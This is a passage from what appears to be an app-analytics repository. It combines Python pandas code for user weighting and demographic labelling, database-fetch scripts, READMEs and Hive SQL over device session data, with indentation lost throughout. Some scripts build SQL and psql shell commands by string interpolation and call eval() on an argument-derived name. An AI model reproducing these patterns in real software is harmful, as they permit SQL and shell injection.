:return DataFrame with labels, LabelEncoder used for enconding
"""
has_known_values = df[modality.keys()].notnull().all(axis=1)
temp_df = df.ix[has_known_values, modality.keys()].copy()
temp_df['dummy'] = ''
modalities = []
for ii, m in enumerate(modality.keys()):
current_modalities = ['not_' + modality[m], modality[m]]
if ii > 0:
temp_df['dummy'] += '&'
modalities = ['&'.join(p) for p in product(modalities, current_modalities)]
else:
modalities = current_modalities
is_in_bucket = temp_df[m] == modality[m]
temp_df.loc[~is_in_bucket, 'dummy'] += current_modalities[0]
temp_df.loc[is_in_bucket, 'dummy'] += current_modalities[1]
if label_encoder == None:
label_encoder = OrderedLabelEncoder(modalities)
labels = pd.Series(label_encoder.transform(temp_df.dummy), index=temp_df.index)
return labels, label_encoder
def split_users(df, labels):
"""
Split DataFrame for known and unknown users.
:param df: DataFrame with the index containing users
:param labels: Labels with the index containing known users
:return tuple with df split for known and unknown users
"""
known_df = df.loc[labels.index]
unknown_idx = df.index.difference(labels.index)
unknown_df = df.loc[unknown_idx]
assert (pd.concat([known_df, labels], axis=1).shape[0] == len(labels)), 'DataFrame not properly aligned with labels'
return known_df, unknown_df
def align_bundle_ids(df, bundle_ids):
"""
Align DataFrame with bundle ID's:
- add missing columns and fill with zero's
- remove columns not in bundle_ids
- reorder columns to follow bundle_ids
:param df: DataFrame
:param bundle_ids: Index of bundle_ids
:return Adjusted DataFrame
"""
temp = df
missing_bundle_ids = bundle_ids.difference(temp.columns)
# Add DataFrame with zeros.
temp = pd.concat([pd.DataFrame(0, index=df.index, columns=missing_bundle_ids), df], axis=1)
return temp[bundle_ids] # Rearrange
def get_period_data(usage, devices, demographics, platform, start_date, end_date, modality):
"""
Get valid usage data for a period.
:param usage: Usage (see data.load_usage())
:param devices: Device info (see data.load_devices())
:param demographics: Demographics data (see e.g. data.load_adx())
:param platform: String with platform ('iOS', 'iPhone' or 'iPad')
:param start_date: datetime with start date
:param end_date: datetime with end date
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
:return: tuple with all usage, labeled usage, unlabeled usage, labels, and label encoder
"""
device_usage, relevant_demographics = filter_data(usage, devices, demographics, platform, start_date, end_date)
# Only keep users with age and gender present
is_not_missing= relevant_demographics[['age_bin', 'gender']].notnull().all(axis=1)
relevant_demographics = relevant_demographics[is_not_missing]
dataset = construct_dataset(device_usage, relevant_demographics, modality)
known_data, unknown_data, labels, label_encoder = dataset
return device_usage, known_data, unknown_data, labels, label_encoder
def get_latest_active_known_usage(usage, devices, demographics, platform):
"""
Get last week/month of usage for active devices with known demographics.
:param usage: Usage (see data.load_usage())
:param devices: Device info (see data.load_devices())
:param demographics: Demographics data (see e.g. data.load_adx())
:param platform: String ('iOS', 'iPhone' or 'iPad')
:return DataFrame with last period of usage per active device with known demographics
"""
platform_devices = _get_platform_devices(devices, platform)
demographics_platform = filter_device_demographics(demographics, platform_devices.device_id.unique())
is_known_device = usage.device_id.isin(demographics_platform.device_id)
latest_device_date = (usage
.loc[is_known_device, ['device_id', 'date']]
.sort(['device_id', 'date'])
.drop_duplicates('device_id', take_last=True))
time_frame_usage = pd.merge(usage.loc[is_known_device], latest_device_date, on=['device_id', 'date'])
time_frame_usage['dummy'] = 1
latest_usage = pd.pivot_table(time_frame_usage, values='dummy', index='device_id',
columns='bundle_id', aggfunc='max', fill_value=0)
return latest_usage.astype(USAGE_DEVICE_DATA_TYPE)
def get_latest_active_adx_usage(*args):
warnings.warn("This function has been deprecated, use get_latest_active_known_usage() instead.",
DeprecationWarning)
return get_latest_active_known_usage(*args)
def get_latest_active_date(device_ids, time_frame):
"""
Get latest active date for specified devices for weekly or monthly time frame.
:param device_ids: List of relevant device ID's
:param time_frame: 'weekly' or 'monthly'
:return: DataFrame with last active data for each active device
"""
active_devices = data.load_all_active_devices(time_frame)
is_valid_device = active_devices.device_id.isin(device_ids)
selected_active_devices = active_devices.ix[is_valid_device]
selected_active_devices.sort(['device_id', 'end_date'], inplace=True)
selected_active_devices.drop_duplicates('device_id', take_last=True, inplace=True)
return selected_active_devices.reset_index(drop=True)
<file_sep>/aa_au_model/correction/estimate.py
__author__ = 'hgriffioen'
import numpy as np
import pandas as pd
import process
SURVEY_PATH = 'data/survey_data.csv'
def compute_user_weights(probabilities, target_distribution):
"""
Compute weight to convert estimated to target population.
:param probabilities: Probabilities of estimated population (m x n, n as number of bins)
:param target_distribution: Target population distribution (n x 1)
:return Series weights for each user (n x 1)
"""
factors = compute_adjustment_factor(probabilities, target_distribution)
user_weights = (probabilities * factors).sum(axis=1)
return user_weights
def compute_adjustment_factor(probabilities, target_distribution):
"""
Compute population adjustment factor.
:param probabilities: Probabilities of estimated population (m x n, n as number of bins)
:param target_distribution: Target population distribution (1 x n)
:return adjustment factor for each bin
"""
bin_sums = probabilities.sum(axis=0)
distribution = bin_sums * 1. / bin_sums.sum()
return target_distribution / distribution
def _convert_fraction_to_distribution(fraction):
"""
Convert fraction to distribution.
:param fraction: Fraction f for the label
:return array with [1-f, f]
"""
return np.array([1 - fraction, fraction])
def compute_survey_distribution(platform, modality, label_encoder=None):
"""
Get survey data for a platform and modality.
:param platform: String ('iOS', 'iPhone' or 'iPad')
:param modality: Dictionary with modality and value to use (e.g. {'gender': 'male', 'age_bin': '13-24})
:param label_encoder: LabelEncoder to use for encoding
:returns Series with distribution over modalities
"""
survey = pd.read_csv(SURVEY_PATH)
in_bin, label_encoder = process._construct_modality_labels(survey, modality, label_encoder)
bin_sums = survey.groupby(in_bin)[platform].sum()
return (bin_sums / bin_sums.sum()), label_encoder
def compute_active_users(usage, user_weights=None):
"""
Compute number of active users of an app.
:param usage: DataFrame with user x app usage
:param user_weights: Series with weights for each user (if None default AU's are computed)
:return: Active users for each app
"""
if user_weights is None:
df = usage.mean()
else:
np.all(user_weights.ix[usage.index].shape == user_weights.shape)
df = usage.T.dot(user_weights.ix[usage.index]) * 1. / user_weights.sum()
return df
def compute_composition(usage, user_probabilities):
"""
Compute composition for each app.
:param usage: DataFrame with user x app usage
:param user_probabilities: DataFrame with probabilities for each user
:return: Expected composition for each app
"""
expected_count = usage.T.dot(user_probabilities)
expected_composition = expected_count.divide(expected_count.sum(axis=1), axis='rows')
return expected_composition
def compute_apps_unweighted(usage, user_labels=None):
"""
Compute unweighted app estimates.
:param usage: DataFrame with user x app usage
:param user_labels: Series with binary labels for each user
if labels stats should be computed
:return count and fraction of AU's and labels
"""
# Compute AU
au_count = usage.sum()
au_fraction = au_count * 1. / usage.shape[0]
user_ix = usage.index
if user_labels is not None:
assert np.all(user_labels.ix[user_ix].shape == user_labels.shape)
label_count = usage.T.dot(user_labels.ix[user_ix])
label_fraction = label_count * 1. / au_count
else:
label_count = np.nan
label_fraction = np.nan
df = pd.DataFrame({'au_n_original': au_count,
'au_f_original': au_fraction,
'label_n_original': label_count,
'label_f_original': label_fraction})
return df
def compute_apps_weighted(usage, user_labels, user_weights):
"""
Compute weighted app estimates.
:param usage: DataFrame with user x app usage
:param user_labels: Series with binary labels for each user
:param user_weights: Series with weights for each user
:return count and fraction of weighted AU's
"""
assert np.all(user_labels.ix[usage.index].shape == user_labels.shape)
au_count = usage.T.dot(user_weights.ix[usage.index])
au_fraction = au_count * 1. / user_weights.sum()
labeled_user_ix = user_labels.index[user_labels == 1]
label_count = usage.ix[labeled_user_ix].T.dot(user_weights.ix[labeled_user_ix])
label_fraction = label_count / au_count
df = pd.DataFrame({'au_n_adjusted': np.round(au_count),
'au_f_adjusted': au_fraction,
'label_n_adjusted': np.round(label_count),
'label_f_adjusted': label_fraction})
return df
def compute_active_user_composition(usage, active_users, user_probability):
"""
Compute the composition of active users is (i.e. distribution over buckets).
:param usage: DataFrame with user x app usage
:param active_users: Active users stats per app
:param user_probability: Bucket probabilities for each user
:return: DataFrame with active user composition
"""
modality_distribution = compute_composition(usage, user_probability)
active_user_composition = modality_distribution.multiply(active_users,
axis='rows')
active_user_composition['all'] = active_users
return active_user_composition
<file_sep>/google-analytics/README.md
# This is sub-module for Google Analytics Benchmark
v2.0 are starting to develop. The version number are aligned with the Google Analytics data. on 10/18/2015, GA data dump in s3 mount point (DS environment) is ready. We are going to:
1. Run sanity check of New GA data v2.0 versus GA data v1.1
2. Reimplement the model trainining scenarios on GA data v2.0
3. Outlier detection/metrics to measure GA data quality
###############################################################
v0.1 was put in 'deprecated' due to the known bug in Google Analytics scrapers
The new version is v1.1 with new pulled data from Google Analytics
We have started machine learning tasks and put them into new folders. Simply speaking, the machine learing focuses on the singals (GA MAU) from Google Analytics, and learning the patterns from MyDM, for exmaple, Duration Length, Time since launch and etc., for better correction/predictions of current MyDM estimations (MyDM MAU).
<file_sep>/weekly_weights/weights.py
'''
Created on May 13, 2013
@author: perezrafael
'''
import pandas as pd
from dateutil.relativedelta import relativedelta
import os
from datetime import datetime
from datetime import timedelta
import psycopg2
from pandas.io import sql
import config
import sys
from joblib import Parallel, delayed
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime as dt
FDATE = '%Y-%m-%d'
FLAT_WEEK = pd.DataFrame({'weekday':[0, 1, 2, 3, 4, 5, 6],
'weight':[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]})
def daterange(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)
def get_reals_from_db(store_id, platform, unit, start_date, end_date, min_units):
''' Load actuals from db
'''
db_name = None
query = None
table_name = None
column_name = None
extra_bit = ''
if unit == 'downloads':
table_name = 'downloads'
column_name = 'units'
elif unit == 'usd':
table_name = 'sales'
column_name = 'revenue'
extra_bit = 'as units'
if platform == 'ios':
db_name = 'aa_staging'
query = "SELECT app_id, date, store_id, %s %s FROM %s WHERE store_id=%s AND date>='%s' AND date<='%s' AND %s>=%s"%(column_name, extra_bit, table_name, store_id, start_date, end_date, column_name, min_units)
elif platform=='android':
db_name = 'aa_staging_android'
query = "SELECT app_class as app_id, date, store_id, %s %s FROM %s WHERE store_id=%s AND date>='%s' AND date<='%s' AND %s>=%s"%(column_name, extra_bit, table_name, store_id, start_date, end_date, column_name, min_units)
#print query
conn = psycopg2.connect("dbname=%s user=aa host=nile"%db_name)
df = sql.frame_query(query, con=conn)
conn.close()
return df
def append_weekdays(df):
''' Check each weekday for each date and append it
'''
dates = df[['date']].drop_duplicates()
if isinstance(dates['date'][:1][0], str):
dates['date'] = dates['date'].apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))
dates['weekday'] = dates['date'].apply(lambda x: x.weekday())
df = df.merge(dates, on='date')
return df
def get_medians_per_weekday(df, min):
df = df[df['units']>=min]
medians = df.groupby(['store_id', 'unit', 'weekday']).median().reset_index()
return medians
def get_std_distance(df, column):
gdf = df.groupby(['store_id', 'unit'])
result = []
for n,g in gdf:
g['%s_std_distance_to_median'%column] = (g[column] - g[column].median())/g[column].std()
result.append(g)
return pd.concat(result)
def cap_weights(df, bottom=0.7, top=1.5):
while any(df['weight'].values < bottom):
df['new_weight'] = df['weight']
df['new_weight'] = df['weight']
#print df
df['new_weight'][df['weight']<bottom] = bottom
#print df
#print df['weight'] - ((df['new_weight'].sum() - df['weight'].sum())/df[df['weight']>bottom].shape[0])
df['new_weight'][df['weight']>bottom] = df['weight'] - ((df['new_weight'].sum() - df['weight'].sum())/df[df['weight']>bottom].shape[0])
#print df
df = df.drop('weight', axis=1)
df.rename(columns={'new_weight':'weight'}, inplace=True)
while any(df['weight'].values > top):
df['new_weight'] = df['weight']
df['new_weight'] = df['weight']
#print df
df['new_weight'][df['weight']>top] = top
#print df
#print df['weight'] - ((df['new_weight'].sum() - df['weight'].sum())/df[df['weight']<top].shape[0])
df['new_weight'][df['weight']<top] = df['weight'] + ((df['weight'].sum() - df['new_weight'].sum())/df[df['weight']<top].shape[0])
#print df
df = df.drop('weight', axis=1)
df.rename(columns={'new_weight':'weight'}, inplace=True)
return df
def get_values_per_order(df, position):
''' Get the weights for each day of the week,
if there is no value for the required position
return an empty dataframe
'''
gdf = df.groupby(['store_id', 'unit', 'date'])
# if gdf.size().max() < position:
#return df.merge(FLAT_WEEK, on='weekday')
# return pd.DataFrame()
weekday_count = df.drop('date', axis=1).groupby(['store_id', 'unit', 'weekday']).size().reset_index()
weekday_count.rename(columns={0:'count'}, inplace=True)
weekday_count = get_std_distance(weekday_count, 'count')
weekday_values = pd.DataFrame()
for n, g in gdf:
g.sort('units', ascending=False, inplace=True)
if g.shape[0]>=position:
values = g[position-1:position][['store_id', 'unit', 'weekday', 'units']]
weekday_values = weekday_values.append(values)
if weekday_values.shape[0]>0:
weekday_values = weekday_values.groupby(['store_id', 'unit', 'weekday'])
weekday_values = weekday_values.mean().reset_index()
#weekday_values = get_std_distance(weekday_values, 'units')
#weekday_values['units'][weekday_values['units_std_distance_to_median']<=-0.4]=weekday_values['units'].mean()
#weekday_values['units'][weekday_values['units_std_distance_to_median']>=1.5]=weekday_values['units']-(weekday_values['units'].std()-2.0)
weekly_mean = weekday_values.groupby(['store_id', 'unit']).mean().reset_index()
weekly_mean.rename(columns={'units':'weekly_mean'}, inplace=True)
weekly_mean = weekly_mean[['store_id', 'unit', 'weekly_mean']]
weekday_values = weekday_values.merge(weekly_mean, on=['store_id', 'unit'])
weekday_values['weight'] = weekday_values['units'] / weekday_values['weekly_mean'].astype(float)
weekday_values = cap_weights(weekday_values, 0.7, 1.5)
weekday_values = weekday_values.merge(weekday_count, on=['store_id', 'unit', 'weekday'])
return weekday_values
def calculate_weights(df, start_period, end_period):
''' Wrapper to get_values_per_order,
appends start and end of period
'''
df = df[df['date'] >= start_period]
df = df[df['date'] <= end_period]
index = df[['date', 'store_id', 'weekday', 'unit']].drop_duplicates()
dates = df[['date', 'weekday']].drop_duplicates()
dates['start_period'] = start_period.strftime(FDATE)
dates['end_period'] = end_period.strftime(FDATE)
v = get_values_per_order(df,100)
if v.shape[0]>0:
v['start_period'] = start_period.strftime(FDATE)
v['end_period'] = end_period.strftime(FDATE)
v = v.merge(dates, on=['weekday', 'start_period', 'end_period'])
else:
v = pd.DataFrame(columns=['count', 'date', 'end_period', 'start_period', 'weekday', 'weekly_mean'])
v = v.merge(df.drop('app_id', axis=1), on=['date', 'weekday'], how='right')
#v = v.merge(index, on=['date', 'store_id', 'weekday', 'unit'], how='right')
v = v.merge(FLAT_WEEK, on='weekday', how='right')
v['units'] = None
v['start_period'] = start_period.strftime(FDATE)
v['end_period'] = end_period.strftime(FDATE)
v = v.drop_duplicates()
return v
def cluster_countries():
pass
def _run(country, platform, unit, start_date, end_date):
vs = pd.DataFrame()
current_end_period = start_date + relativedelta(days=6)
while (current_end_period <= end_date):
current_start_period = current_end_period - relativedelta(days=6)
print(current_start_period)
print(current_end_period)
print(country, platform, unit)
df = get_reals_from_db(country, platform, unit, current_start_period.strftime(FDATE), current_end_period.strftime(FDATE), 0)
if df.shape[0] == 0:
current_end_period += relativedelta(days=7)
continue
df = append_weekdays(df)
df['unit'] = unit
v = calculate_weights(df, current_start_period.date(), current_end_period.date())
if v.shape[0]>0:
vs = vs.append(v)
current_end_period += relativedelta(days=7)
return vs
if __name__ == '__main__':
'''python weights.py android 2012-01-02 2012-01-10
argv[1] = platform (ios or android)
argv[2] = start_date
argv[3] = end_date
argv[4] = store_id
argv[5] = debug (generate debug data or not)
The script will start on start date and count 7 days from it,
then generate weights for each week after that.
E.g. if start_date is Sunday, it will generate weekly weights
for Sunday-Saturday weeks.
If start_date is Wednesday, the week will be considered
Wednesday-Tuesday.
If end_date is not the considered end of a week, the final week
will be the last week when we have all 7 days.
'''
platform = sys.argv[1]
start_date = sys.argv[2]
end_date = sys.argv[3]
store_id = sys.argv[4]
debug = sys.argv[5]
if platform =='ios':
countries = config.IOS_STORES_DICT.keys()
elif platform == 'android':
countries = config.ANDROID_STORES_DICT.keys()
else:
print 'Wrong platform'
exit(1)
if store_id != 'all':
countries = [int(store_id)]
#countries = [45,46,47,48]
units = ['downloads', 'usd']
values = []
str_start_date = start_date
str_end_date = end_date
start_date = datetime.strptime(start_date, FDATE)
end_date = datetime.strptime(end_date, FDATE)
values = Parallel(n_jobs=20)(delayed(_run)(country, platform, unit, start_date, end_date)
for country in countries for unit in units)
#for country in countries:
# for unit in units:
# values.append(_run(country, platform, unit, start_date, end_date))
result = pd.DataFrame()
for value in values:
if value.shape[0]>0:
result = result.append(value)
if debug != 'debug':
result = result[['date', 'weight', 'store_id', 'unit']]
result = result.sort(['unit', 'store_id', 'date'])
result.to_csv('weights_%s_%s_%s_%s.csv'%(platform, store_id, str_start_date, str_end_date), index=False)
#result = result.dropna()
#result = result[result['store_id']==9]
#result = result[result['unit']=='usd']
gdf = result.groupby(['unit', 'store_id'])
for n,g in gdf:
#g['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in g['date']]
plt.clf()
fig = plt.figure(figsize=(int(g.shape[0]/3),6))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
plt.plot(g['date'], g['weight'], '-')
plt.gcf().autofmt_xdate()
plt.title(str(n))
ax.grid()
plt.savefig('./plots/%s.png'%str(n))
#plt.show()
<file_sep>/evaluation/py/fetch_real_values.py
"""
Fetch real values from the database.
Arguments:
-p The platform configure to use.
"""
## Author: <NAME> <<EMAIL>>
import os.path
import os
import commands
import itertools
from internal.args import parse_options
from internal import utilities_date
from internal import utilities_pandas
config_ios = {
## It's recommended to symlink the file here.
'db_info': {'host': 'nile',
'db_name': 'aa_staging',
'username': 'aa'}
}
config_android = {
'db_info': {'host': 'nile',
'db_name': 'aa_staging_android',
'username': 'aa'}
}
def main():
opts, args = parse_options()
# Get the options.
stores = opts.stores
dtstart = opts.daterange[0]
dtend = opts.daterange[1]
units_types = opts.units_types
# Load platform-dependent config.
config = eval('config_%s' % opts.platform.split('_')[0].lower())
db_info = config['db_info']
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
# Iterate through (stores, feeds, dts).
for (store, unit) in itertools.product(stores, units_types):
df = _fetch_from_db(store, unit, dts_daily[0], dts_daily[-1], db_info)
if df.shape[0] < 1:
df = _fetch_from_dwh(store, unit, dts_daily[0], dts_daily[-1], db_info)
csv_filename = os.path.join(args[0], "%s_%s_%s--%s.csv" % (store, unit,
dts_daily[0],
dts_daily[-1]))
df.rename(columns={'revenue': 'units'}, inplace=True)
df.to_csv(csv_filename, index=False)
def _fetch_from_dwh(store, unit, dtstart, dtend, db_info):
common_suffix = 'WHERE store_id=%s ' % store + \
'AND date >= DATE(\'%s\') ' % dtstart + \
'AND date <= DATE(\'%s\'))' % dtend
if unit == 'Downloads':
cmd = 'echo "COPY (SELECT date, app_id, units FROM downloads ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U %s -h %s %s' % (db_info['username'],
db_info['host'],
db_info['db_name'])
elif unit == 'USD':
cmd = 'echo "COPY (SELECT date, app_id, revenue FROM sales ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U %s -h %s %s' % (db_info['username'],
db_info['host'],
db_info['db_name'])
else:
raise Exception('Unit types should be Downloads or USD')
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching daily estimation: %s" % cmd)
return utilities_pandas.convert_str_to_df(stdout)
def _fetch_from_db(store, unit, dtstart, dtend, db_info):
common_suffix = 'WHERE d.store_id=%s ' % store + \
'AND d.date >= DATE(\'%s\') ' % dtstart + \
'AND d.date <= DATE(\'%s\'))' % dtend
if 'android' in db_info['db_name']:
app_id = 'app_class'
else:
app_id = 'app_id'
if unit == 'Downloads':
cmd = 'echo "COPY (SELECT date, %s as app_id, units FROM downloads d '%app_id + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U %s -h %s %s' % (db_info['username'],
db_info['host'],
db_info['db_name'])
elif unit == 'USD':
cmd = 'echo "COPY (SELECT date, %s as app_id, revenue FROM sales d '%app_id + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -U %s -h %s %s' % (db_info['username'],
db_info['host'],
db_info['db_name'])
else:
raise Exception('Unit types should be Downloads or USD')
print(cmd)
status, stdout = commands.getstatusoutput(cmd)
if status is None or status >= 2:
raise Exception("Have problem fetching daily estimation: %s" % cmd)
return utilities_pandas.convert_str_to_df(stdout)
if __name__ == '__main__':
main()
<file_sep>/old_investigations/README.md
# Author
- <NAME> <<EMAIL>, <EMAIL>>
# Data Preparation
## Method
Before doing anything meaning, you have to fetch the related data from the remote data source. Currently, we use Mark's script for fetching daily estimation, and psql for real values.
To fetch the estimation and real values and combine them together, the sciprt `run_fetch_and_concat.py` is supposed to be runned.
The join of estimations and real values is a **inner** join, so the data is kept only when we have both estimations and real values, for each (day, app, category, feed) combination.
## Usage
To use all the script, we first have to use `run_fetch_and_concat.py` to concat data with Mark's script (daily)
### Options:
* -s: Required. A list of the stores that you want to calculate, separated by comma. e.g. 143441,143444,143462,143465,143466
* -d: Required. Date range, could be a single month(e.g. 2012-09), a range of months(e.g. 2012-04--2012-05) or a range of days(e.g. 2012-03-02--2012-07-08)
* -u: Required. A list of type of units to inspect (Downloads or USD), separated by comma. e.g. Downloads,USD
* -x: Optional. Whether to overwrite the exisitng caches.
### Examples:
python run_fetch_and_concat.py -s 143441,143444,143462,143465,143466 -d 2012-09 -u Downloads,USD
### Results
- The program will generate some caches to avoid the pain of re-downloading. They will be in `cache` directory.
- The concated data, will be in `data` directory.
# SDA
## Method
In each day, for each app, it can be ranked in different categories (Overall, Games, etc.) and feeds (IPhone Free, IPad Paid, etc). As long as we have a rank, we can get an estimation.
In each day, for each app, and each category, we sum the estimations from different feeds.
- For Downloads, sum the estimations from IPhone FREE, IPhone PAID, IPAD FREE, IPAD PAID
- For USD, sum the estimations from IPhone GROSSING, IPAD GROSSING.
In the program this is done through `groupby` with the field `App ID` and `Unit` in `internal/calculate_sda.py`.
After summation, we get a single estimation in each day, for each app, and each category (for Downloads and USD respectively). In each day, for each app, the following estimations are picked across categories:
- estimate_dailyworst: Pick the estimations that is the worst one across categories, compared with real values.
- estimate_dailyworst: Pick the estimations that is the worst one across categories, compared with real values.
- estimate_avg: Average the estimations from different categories.
- estimate_overall: Pick the estimations from the Overall category. Remember there would be many missing estimations for lower-rank apps.
- units_avg: This is the real values, picked by averaging different categories (they should be the same).
## Usage
Use the script `run_calculate_sda.py`
### Options:
* -d Required. Downloads data, generated by `run_fetch_and_concat.py`
* -u Required. USD data, generated by `run_fetch_and_concat.py`
* -r Optional. Reference file, which contains the App that we cares.
Downloads data and USD data should be generated by `run_fetch_and_concat.py` files.
The reference file contains the current best estimation (monthly). With that we can join SDA with this reference file for comparsion. If that is not specified, we generate SDA for all apps.
**All these files should be in the same country and same period, otherwise it makes no sense.**
### Examples:
python run_calculate_sda.py -d data/United\ States_2012-09-01--2012-09-30_Downloads.csv -u data/United\ States_2012-09-01--2012-09-30_USD.csv -r Rafael_request/United\ States/AppAnnie_Estimates.csv
### Results:
- The generated SDA data, will be in `sda` directory. With daily ones, and aggreagted ones. A column named `both_real_estimate_num` will be added for the aggregated ones, to indicate how many days we have both real values and estimations.
# Provision and Extensions
To extend the script for Android or other data source. We need to get estimation and real values from the database.
## Estimation
For estimation, please check the `_run_daily_basis_script` function in `internal/monthly_concater.py`. The program expects a daily script that accepts a (store_id, feed_id, date) combination, and output a CSV. For the current daily script (written by <NAME>), we have the following formats:
- Parameters:
-s[store] -f[feed] -d[date]
- Output example:
category_id,rank,app_id,estimate
36,1,432849519,25006
36,2,419396407,23158
36,3,343200656,22141
So to minimize the pain, the new daily script for other data source should satisfy the same input & output format.
## Real Values
The real values are fetched in the `fetch_real_units_reference` function of `run_fetch_and_concat.py`. It's based on PSQL, it's fetched on the monthly basis, based on a single (store_id, month) combination.
And it will generate two files for each combination, one Downloads and one USD.
For other data source, the same combination (store_id, month) should be accpeted, and the output is expected to be as follows for **Downloads**
date,app_id,units
2012-09-01,475136005,1
2012-09-01,478896989,3
...
2012-09-30,460186290,7
2012-09-30,384303098,2
2012-09-30,511836156,6
For **USD** the final column is ecpted to be *revenue* instead of *units*
date,app_id,revenue
2012-09-01,475136005,0.7
2012-09-01,486408199,1.4
2012-09-01,441712648,35
...
2012-09-30,492044257,8.4
2012-09-30,484573159,4.9
2012-09-30,512622577,0.7
# Plots
Plots are generated based on SDA (daily or monthly). Please specify the SDA file as the argument to the plot script.
For plotting daily SDA, you can compare with Overall or Games, with different scripts.
## 80/20 Plots
- Rscript plot_80_20.R monthly_sda.csv
- Rscript plot_80_20_daily_vs_overall.R daily_sda.csv
- Rscript plot_80_20_daily_vs_games.R daily_sda.csv
## Density Plots
- Rscript plot_hist.R monthly_sda.csv
- Rscript plot_hist_daily_vs_overall.R daily_sda.csv
- Rscript plot_hist_daily_vs_games.R daily_sda.csv
## SDA Improvement Plots
- Rscript plot_improvement.R monthly_sda.csv
- Rscript plot_improvement_daily_vs_overall.R daily_sda.csv
- Rscript plot_improvement_daily_vs_games.R daily_sda.csv
## Results
The generated plots would be in the ./plots folder.
<file_sep>/google-analytics/rincon_dump/test_predict.py
import dill
import copy
import pandas as pd
cntry_list = ['GB']
dev_list = ['Android Mobile']
for cntry in cntry_list:
for dev in dev_list:
# convert the strings to lists which can be iteratible
if type(cntry) == str:
cntry = [cntry]
if type(dev) == str:
dev = [dev]
print cntry, dev
#??? Where are the non-dill'ed versions of the Rincon_Classes?
fileObject = open('./class/original/Rincon_Class_{}_{}.dill'.format(cntry[0], dev[0]), 'r')
new_class_ = dill.load(fileObject)
mdm_dat = new_class_[0].load_data('../data/MDM_0118.csv', train=False)
val_data = mdm_dat[(mdm_dat['Country'].isin(cntry))
& (mdm_dat['Device Type'].isin(dev))
].copy()
fileObject.close()
#??? Is the model pre-trained in new_class_?
#Yes
pred_new = new_class_[0].predict(val_data)
pred_new.to_csv('./temp/pred_{}_{}.csv'.format(cntry, dev), index=False, header=False)
<file_sep>/evaluation/py/internal/utilities_pandas.py
"""
Pandas related utilities
"""
# Author: <NAME> <<EMAIL>>
import pandas as pd
from StringIO import StringIO
def convert_str_to_df(s):
return pd.read_csv(StringIO(s))
def add_date_column(df, date):
df['date'] = date
return df
<file_sep>/aa_au_model/heavy_usage/sql/get_sample_user_stats.sql
set hive.auto.convert.join=false;
set hive.cli.print.header = false;
set hive.exec.dynamic.partition = true;
set hive.exec.dynamic.partition.mode = nonstrict;
set start_date = '2015-04-01';
set end_date = '2015-04-30';
set week_end_date = '2015-04-25';
-- Determine active devices in each week/month for later filtering
drop table if exists period_active_weekly;
create table period_active_weekly (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-weekly'
;
insert overwrite table period_active_weekly
select
x.end_period_date,
x.device_id
from (
select
active.end_period_date,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
active_devices_weekly active
group by
active.end_period_date,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
drop table period_active_monthly;
create table period_active_monthly (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-monthly'
;
insert overwrite table period_active_monthly
select
x.end_period_date,
x.device_id
from (
select
active.end_period_date,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
active_devices_monthly active
group by
active.end_period_date,
active.device_id
having
cast(count(distinct(active.date)) as int) = day(active.end_period_date)
) x
;
drop table if exists ios_devices;
create table ios_devices
as
select
device_id,
max(type) as type
from
vpn_new_device_info
where
platform = 'iOS'
and (type = 'Tablet' or type = 'Smartphone')
group by
device_id
;
drop table if exists period_users;
create table period_users (
device_id string,
type string,
total_bandwidth float
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/sample_period_users'
;
insert overwrite table period_users
select
x.device_id,
x.type,
x.total_bandwidth
from (
select
c.device_id,
max(d.type) as type,
c.datestr,
sum(output_bytes + input_bytes) / 1073741824 as total_bandwidth
from
ios_devices d
join vpn_sample_data_connection_session c
on d.device_id = c.device_id
where
c.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
group by
c.device_id
order by
c.device_id desc
) x
;
drop table if exists period_users_week;
create table period_users_week (
device_id string,
type string,
total_bandwidth float
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/whales/sample_period_users_week'
;
insert overwrite table period_users_week
select
x.device_id,
x.type,
x.total_bandwidth
from (
select
c.device_id,
max(d.type) as type,
sum(output_bytes + input_bytes) / 1073741824 as total_bandwidth
from
period_active_weekly active
join ios_devices d
on active.device_id = d.device_id
join vpn_sample_data_connection_session c
on d.device_id = c.device_id
where
active.end_period_date = ${hiveconf:week_end_date}
and c.datestr between date_sub(${hiveconf:week_end_date}, 6) and ${hiveconf:week_end_date}
group by
c.device_id
order by
device_id desc
) x
;
drop table if exists daily_sessions_per_user;
create table daily_sessions_per_user
as
select
session.datestr,
session.device_id,
session.bundleid,
max(session.end_period_date) as weekly_end_period_date,
sum(session_duration) as session_duration,
count(*) as n_sessions
from
(
select
s.device_id,
s.bundleid,
w.end_period_date,
(endtime - starttime) as session_duration,
datestr
from
active_devices_weekly w
join period_users device
on w.device_id = device.device_id
join vpn_sample_data_session s
on w.device_id = s.device_id
and w.date = s.datestr
and s.country = 'US'
where
(
(
(endtime - starttime > 1000)
or bundleid in (
'com.google.Translate',
'com.sgn.cookiejam',
'com.bitrhymes.bingo2',
'com.weplaydots.twodots')
)
)
and s.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
-- limit 3
) as session
group by
session.datestr,
session.device_id,
